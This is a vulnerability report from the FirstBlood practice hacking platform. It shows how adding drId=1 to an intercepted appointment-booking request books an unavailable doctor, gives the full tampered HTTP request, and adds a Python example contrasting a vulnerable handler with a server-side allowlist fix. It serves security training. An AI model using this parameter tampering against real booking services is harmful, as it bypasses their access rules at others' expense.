FirstBlood-#1027 — Can book an appointment with an unavailable doctor
This issue was discovered on FirstBlood v3
On 2022-12-08, properlay Level 7 reported:
Hello, I found a way to book an appointment with an unavailable doctor.
To reproduce:
- When booking an appointment, turn Burp Suite's intercept ON.
- Then fill in all the required info and click Book Appointment.
- In the intercepted request, add drId=1:
POST /api/ba.php HTTP/1.1
Host: e00b0c1f0b0b-properlay.a.firstbloodhackers.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Anti-Csrf: 82070-4702-33892
Content-Length: 137
Origin: https://e00b0c1f0b0b-properlay.a.firstbloodhackers.com
Referer: https://e00b0c1f0b0b-properlay.a.firstbloodhackers.com/book-appointment.php
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
Connection: close

fname=test&lname=test&address=test&city=test&phonenumber=123123&email=23123&dob=12/04/2022&a1=&a2=&a3=&message=&slot=3&drId=1
- Forward the request; you will see that you have booked an appointment with Julie (a doctor who is unavailable for booking).
Impact:
You can book an appointment with an unavailable doctor.
P4 Low
FirstBlood ID: 67
Vulnerability Type: Application/Business Logic
It is possible to book an unavailable doctor
Creator & Administrator
Congratulations, you were the first to report this!
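The root cause in this report is that the booking endpoint trusts the drId value in the form body instead of re-checking on the server whether that doctor is actually bookable. The following is an added example (not FirstBlood's code and not the reporter's) that models both behaviours in Python: a handler that accepts whatever drId the client sends, and a hardened handler that validates it against a server-side availability allowlist. The doctor table is constructed for the example; only the fact that drId=1 is Julie and unavailable comes from the report, the other doctors, the `available` flag and all function names are assumptions.

```python
from urllib.parse import parse_qs

# Constructed doctor table for this example. drId 1 -> Julie follows the
# report (drId=1 booked the unavailable doctor Julie); the remaining rows
# and the 'available' flag are assumptions, not FirstBlood's real data.
DOCTORS = {
    1: {"name": "Julie", "available": False},
    2: {"name": "Dr. Two", "available": True},
    3: {"name": "Dr. Three", "available": True},
}

# Form body exactly as the reporter sent it, with the injected drId=1 at the end.
TAMPERED_BODY = (
    "fname=test&lname=test&address=test&city=test&phonenumber=123123"
    "&email=23123&dob=12/04/2022&a1=&a2=&a3=&message=&slot=3&drId=1"
)


def parse_form(body):
    """Decode an application/x-www-form-urlencoded body into single values."""
    return {k: v[0] for k, v in parse_qs(body, keep_blank_values=True).items()}


def parse_doctor_id(form):
    """Return drId as an int, or None if it is missing or not numeric."""
    try:
        return int(form.get("drId", ""))
    except ValueError:
        return None


def book_vulnerable(body):
    """Models the reported behaviour: any doctor id in the form is booked,
    with no check that the doctor is actually open for appointments."""
    form = parse_form(body)
    dr_id = parse_doctor_id(form)
    if dr_id not in DOCTORS:
        return {"ok": False, "error": "unknown doctor"}
    return {"ok": True, "doctor": DOCTORS[dr_id]["name"], "slot": form["slot"]}


def bookable_doctor_ids():
    """Server-side allowlist: only the doctors the UI would offer."""
    return {i for i, d in DOCTORS.items() if d["available"]}


def book_hardened(body):
    """Re-derives availability on the server instead of trusting the form.
    The client may choose among bookable doctors, never an arbitrary id."""
    form = parse_form(body)
    dr_id = parse_doctor_id(form)
    if dr_id is None:
        return {"ok": False, "error": "invalid doctor id"}
    if dr_id not in bookable_doctor_ids():
        # Same response whether the id is unknown or merely unavailable,
        # so the client cannot enumerate which doctors exist.
        return {"ok": False, "error": "doctor not available for booking"}
    return {"ok": True, "doctor": DOCTORS[dr_id]["name"], "slot": form["slot"]}


if __name__ == "__main__":
    print("vulnerable:", book_vulnerable(TAMPERED_BODY))
    print("hardened:  ", book_hardened(TAMPERED_BODY))
```

The point of `bookable_doctor_ids()` is that the decision comes from server-held state, so removing a doctor from the booking page also removes them from what `/api/ba.php` will accept; hiding an option in the UI alone, as the report shows, is not a control.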